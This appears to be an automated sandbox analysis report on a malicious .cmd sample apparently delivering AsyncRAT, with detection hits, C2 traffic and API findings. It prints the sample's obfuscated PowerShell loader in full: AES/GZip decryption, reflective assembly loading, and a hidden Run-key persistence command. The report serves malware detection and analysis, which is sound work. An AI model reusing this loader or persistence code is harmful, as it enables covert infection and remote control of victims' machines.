($BpbHj.StartsWith(':: ')) { $syTFV=$BpbHj.Substring(3); break; }}$eWOHt=[string[]]$syTFV.Split('\');Invoke-Expression '$fHjin=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[0])));'.Replace('blck', '');Invoke-Expression '$gCnqy=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[1])));'.Replace('blck', '');bKLzO $fHjin (,[string[]] (''));bKLzO $gCnqy (,[string[]] ('')); , CommandLine: cmd.exe /c echo function PNNxp($qgBgH){ $eOCgk=[System.Security.Cryptography.Aes]::Create(); $eOCgk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $eOCgk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $eOCgk.Key=[System.Convert]::FromBase64String('Y9z5o9CK+DHYcwqkzoy/iWEpX+O8
Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aYWZgkdITfai{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$fJPxTSrGmUkcyL,[Parameter(Position=1)][Type]$DKfBMaOKCb)$QUflgQKJgBw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+'c'+[Char](116)+''+'e'+''+[Char](100)+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+'ate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+[Char](101)+''+'m'+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+'l'+'e'+'',$False).DefineType('M'+[Char](121)+'De'+[Char](108)+'eg'+'a'+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+[Char](108)+''+'i'+''+[Char](99)+''+','+''+'S'+''+'e'+'a'+[Char](108)+'e'+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+[Char](115)+'i'+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+','+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$QUflgQKJgBw.DefineConstructor(''+[Char](82)+'T'+'S'+''+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+','+'H'+''+'i'+''+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$fJPxTSrGmUkcyL).SetImplementationFlags(''+'R'+'u'+'n'+''+'t'+''+[Char](105)+''+'m'+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');$QUflgQKJgBw.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+'N'+[Char](101)+''+'w'+'S'+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+'V'+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'',$DKfBMaOKCb,$fJPxTSrGmUkcyL).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+'m'+[Char](101)+''+','+''+'M'+''+[Char](97)+''+'n'+''+'a'+'g'+[Char](101)+'d');Write-Output $QUflgQKJgBw.CreateType();}$WRnqVVFrVLSrh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+'tem'+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+'M'+''+[Char](105)+''+'c'+''+[Char](114)+''+[Char](111)+''+'s'+''+'o'+''+[Char](102)+''+[Char](116)+''+'.'+'W'+'i'+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+'.'+''+'U'+'ns'+[Char](97)+''+[Char](102)+
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aYWZgkdITfai{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$fJPxTSrGmUkcyL,[Parameter(Position=1)][Type]$DKfBMaOKCb)$QUflgQKJgBw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+'c'+[Char](116)+''+'e'+''+[Char](100)+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+'ate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+[Char](101)+''+'m'+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+'l'+'e'+'',$False).DefineType('M'+[Char](121)+'De'+[Char](108)+'eg'+'a'+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+[Char](108)+''+'i'+''+[Char](99)+''+','+''+'S'+''+'e'+'a'+[Char](108)+'e'+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+[Char](115)+'i'+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+','+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$QUflgQKJgBw.DefineConstructor(''+[Char](82)+'T'+'S'+''+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+','+'H'+''+'i'+''+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$fJPxTSrGmUkcyL).SetImplementationFlags(''+'R'+'u'+'n'+''+'t'+''+[Char](105)+''+'m'+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');$QUflgQKJgBw.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+'N'+[Char](101)+''+'w'+'S'+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+'V'+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'',$DKfBMaOKCb,$fJPxTSrGmUkcyL).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+'m'+[Char](101)+''+','+''+'M'+''+[Char](97)+''+'n'+''+'a'+'g'+[Char](101)+'d');Write-Output $QUflgQKJgBw.CreateType();}$WRnqVVFrVLSrh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+'tem'+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+'M'+''+[Char](105)+''+'c'+''+[Char](114)+''+[Char](111)+''+'s'+''+'o'+''+[Char](102)+''+[Char](116)+''+'.'+'W'+'i'+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+'.'+''+'U'+'ns'+[Char](97)+''+[Char](102)+
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, CommandLine: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, CommandLine|base64offset|contains: 7z, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: powershell.exe -WindowStyle Hidden, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7080, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, ProcessId: 4788, ProcessName: schtasks.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c echo function PNNxp($qgBgH){ $eOCgk=[System.Security.Cryptography.Aes]::Create(); $eOCgk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $eOCgk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $eOCgk.Key=[System.Convert]::FromBase64String('Y9z5o9CK+DHYcwqkzoy/iWEpX+O8Iv9A3DgJbXPgJZk='); $eOCgk.IV=[System.Convert]::FromBase64String('6XSbRvuRO9XQg710dEY/2A=='); $HrolG=$eOCgk.CreateDecryptor(); $IcZIb=$HrolG.TransformFinalBlock($qgBgH, 0, $qgBgH.Length); $HrolG.Dispose(); $eOCgk.Dispose(); $IcZIb;}function YVagc($qgBgH){ Invoke-Expression '$KSWxg=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$qgBgH);'.Replace('blck', ''); Invoke-Expression '$QmRKw=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IvNNq=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($KSWxg, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IvNNq.CopyTo($QmRKw); $IvNNq.Dispose(); $KSWxg.Dispose(); $QmRKw.Dispose(); $QmRKw.ToArray();}function bKLzO($qgBgH,$HpAZd){ Invoke-Expression '$Koibj=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$qgBgH);'.Replace('blck', ''); Invoke-Expression '$eMXWr=$Koibj.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$eMXWr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $HpAZd)blck;'.Replace('blck', '');}$DgVFr = 'C:\Users\user\Desktop\1 (2).cmd';$host.UI.RawUI.WindowTitle = $DgVFr;$BZwPR=[System.IO.File]::ReadAllText($DgVFr).Split([Environment]::NewLine);foreach ($BpbHj in $BZwPR) { if ($BpbHj.StartsWith(':: ')) { $syTFV=$BpbHj.Substring(3); break; }}$eWOHt=[string[]]$syTFV.Split('\');Invoke-Expression '$fHjin=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[0])));'.Replace('blck', '');Invoke-Expression '$gCnqy=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[1])));'.Replace('blck', '');bKLzO $fHjin (,[string[]] (''));bKLzO $gCnqy (,[string[]] ('')); , CommandLine: cmd.exe /c echo function PNNxp($qgBgH){ $eOCgk=[System.Security.Cryptography.Aes]::Create(); $eOCgk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $eOCgk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $eOCgk.Key=[System.Convert]::FromBase64String('Y9z5o9CK+DHYcwqkzoy/iWEpX+O8
Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7720, TargetFilename: C:\Windows\$rbx-onimai2\$rbx-CO2.bat
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7080, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$rbx-XVR
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7720, TargetFilename: C:\Windows\$rbx-onimai2\$rbx-CO2.bat
Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7080, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$rbx-XVR
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dllhost.exe /Processid:{efb95082-f278-4e03-9e3f-6389e31f9866}, ParentImage: C:\Windows\System32\dllhost.exe, ParentProcessId: 2384, ParentProcessName: dllhost.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 920, ProcessName: svchost.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -WindowStyle Hidden, CommandLine: powershell.exe -WindowStyle Hidden, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1 (2).cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7480, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden, ProcessId: 7720, ProcessName: powershell.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-03T14:55:20.913610+020020355951Domain Observed Used for C2 Detected154.216.20.1326969192.168.2.863301TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.1% probability
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 37_2_00401000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,37_2_00401000
Source: unknownHTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.8:63304 version: TLS 1.2
Source: C:\Windows\System32\conhost.exeCode function: 20_2_000001B44490D894 FindFirstFileExW,20_2_000001B44490D894
Source: C:\Windows\System32\conhost.exeCode function: 20_2_000001B44490DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,20_2_000001B44490DA18
Source: C:\Windows\System32\dllhost.exeCode function: 40_2_000001C0401CDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,40_2_000001C0401CDA18
Source: C:\Windows\System32\dllhost.exeCode function: 40_2_000001C0401CD894 FindFirstFileExW,40_2_000001C0401CD894
Source: C:\Windows\System32\dllhost.exeCode function: 40_2_000001C0401FDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,40_2_000001C0401FDA18
Source: C:\Windows\System32\dllhost.exeCode function: 40_2_000001C0401FD894 FindFirstFileExW,40_2_000001C0401FD894
Source: C:\Windows\System32\winlogon.exeCode function: 41_2_000002E99175D894 FindFirstFileExW,41_2_000002E99175D894
Source: C:\Windows\System32\winlogon.exeCode function: 41_2_000002E99175DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,41_2_000002E99175DA18
Source: C:\Windows\System32\winlogon.exeCode function: 41_2_000002E99178D894 FindFirstFileExW,41_2_000002E99178D894
Source: C:\Windows\System32\winlogon.exeCode function: 41_2_000002E99178DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,41_2_000002E99178DA18
Source: C:\Windows\System32\svchost.exeCode function: 43_2_00000158709DD894 FindFirstFileExW,43_2_00000158709DD894
Source: C:\Windows\System32\svchost.exeCode function: 43_2_00000158709DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,43_2_00000158709DDA18
Source: C:\Windows\System32\svchost.exeCode function: 45_2_000002A3F066D894 FindFirstFileExW,45_2_000002A3F066D894
Source: C:\Windows\System32\svchost.exeCode function: 45_2_000002A3F066DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,45_2_000002A3F066DA18

Networking

barindex
Source: Network trafficSuricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 154.216.20.132:6969 -> 192.168.2.8:63301
Source: global trafficTCP traffic: 192.168.2.8:63301 -> 154.216.20.132:6969
Source: Joe Sandbox ViewIP Address: 195.201.57.90 195.201.57.90
Source: Joe Sandbox ViewIP Address: 195.201.57.90 195.201.57.90
Source: Joe Sandbox ViewASN Name: SKHT-ASShenzhenKatherineHengTechnologyInformationCo SKHT-ASShenzhenKatherineHengTechnologyInformationCo
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknownDNS query: name: ipwho.is
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: azure-winsecure.com
Source: global trafficDNS traffic detected: DNS query: ipwho.is
Source: lsass.exe, 0000002A.00000002.2699722963.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: lsass.exe, 0000002A.00000002.2722818300.00000213BD59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002A.00000002.2719554200.00000213BD4EC000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002A.00000000.2198040001.00000213BD460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 0000002A.00000002.2710922540.00000213BD400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
Source: lsass.exe, 0000002A.00000002.2699722963.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: powershell.exe, 00000008.00000002.1695203762.00000201CD3A0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftA
Source: lsass.exe, 0000002A.00000002.2699722963.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: lsass.exe, 0000002A.00000002.2722818300.00000213BD59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002A.00000002.2719554200.00000213BD4EC000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002A.00000000.2198040001.00000213BD460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 0000002A.00000002.2710922540.00000213BD400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
Source: lsass.exe, 0000002A.00000002.2722818300.00000213BD59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002A.00000002.2719554200.00000213BD4EC000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002A.00000000.2198040001.00000213BD460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 0000002A.00000002.2699722963.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 0000002A.00000002.2710922540.00000213BD400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 0000002A.00000002.2699722963.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: powershell.exe, 00000008.00000002.1940456822.00000201DF0CC000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2423655674.000001A39E520000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2423655674.000001A39E37A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: lsass.exe, 0000002A.00000002.2722818300.00000213BD59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002A.00000002.2699722963.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002A.00000002.2719554200.00000213BD4EC000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002A.00000000.2198040001.00000213BD460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002A.00000002.2710922540.00000213BD400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 0000002A.00000002.2699722963.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
Source: powershell.exe, 00000026.00000002.2212213314.000001A38E53D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.1695772455.00000201CF041000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2175061332.0000000004E03000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2212213314.000001A38E311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 0000002A.00000002.2699722963.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: powershell.exe, 00000026.00000002.2212213314.000001A38E53D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000008.00000002.1695772455.00000201CF041000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000008.00000002.1695772455.00000201CF041000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2212213314.000001A38E311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000023.00000002.2175061332.0000000004E19000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2175061332.0000000004E28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000008.00000002.1695772455.00000201CF041000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6xGA
Source: powershell.exe, 00000026.00000002.2423655674.000001A39E37A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000026.00000002.2423655674.000001A39E37A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000026.00000002.2423655674.000001A39E37A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000026.00000002.2212213314.000001A38E53D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000026.00000002.2212213314.000001A38F45A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000008.00000002.1940456822.00000201DF0CC000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2423655674.000001A39E37A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: unknownNetwork traffic detected: HTTP traffic on port 63304 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63304
Source: unknownHTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.8:63304 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindows user hook set: 0 keyboard low level C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System Summary

barindex
Source: Process Memory Space: powershell.exe PID: 7720, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_00007FFB4B10DF98 NtUnmapViewOfSection,38_2_00007FFB4B10DF98
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_00007FFB4B10E0DA NtWriteVirtualMemory,38_2_00007FFB4B10E0DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_00007FFB4B10E102 NtSetContextThread,38_2_00007FFB4B10E102
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_00007FFB4B10E122 NtResumeThread,38_2_00007FFB4B10E122
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_00007FFB4B110FE4 NtResumeThread,38_2_00007FFB4B110FE4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_00007FFB4B110C5D NtWriteVirtualMemory,38_2_00007FFB4B110C5D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_00007FFB4B10E078 NtUnmapViewOfSection,38_2_00007FFB4B10E078
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_00007FFB4B110F20 NtSetContextThread,38_2_00007FFB4B110F20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_00007FFB4B110A3E NtUnmapViewOfSection,38_2_00007FFB4B110A3E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_00007FFB4B10E112 NtSetContextThread,38_2_00007FFB4B10E112
